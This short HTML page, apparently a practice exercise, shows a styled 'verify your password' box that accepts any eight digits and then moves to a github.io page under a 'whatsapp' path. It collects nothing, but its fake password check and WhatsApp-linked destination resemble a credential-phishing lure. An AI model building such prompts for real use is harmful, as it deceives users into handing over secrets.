<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
          .container{
            width: 300px;
            height:450px ;
            border: 1px solid;
            background-color: rgb(32, 55, 55);
        }
        .a{
            position: relative;
            top: 140px;
            left: 70px;
        }
        .b{
            position: relative;
            top: 150px;
            left: 60px;
            border-radius: 2px;
        }
        .c{
            position: relative;
            top: 160px;
            left: 120px;
        }
    </style>
</head>
<body>
    <div class="container">
        <form action="https://aravind-03012002.github.io/whatsapp/index2.html" method="get">
        <label class="a" for="abc">verify your password</label><br>
        <input class="b" type="text" id="abc" pattern="[0-9]{8,8}" required title="password is incorrect" placeholder="enter password"><br>
        <input class="c" type="submit">
    </div>
</body>
</html>
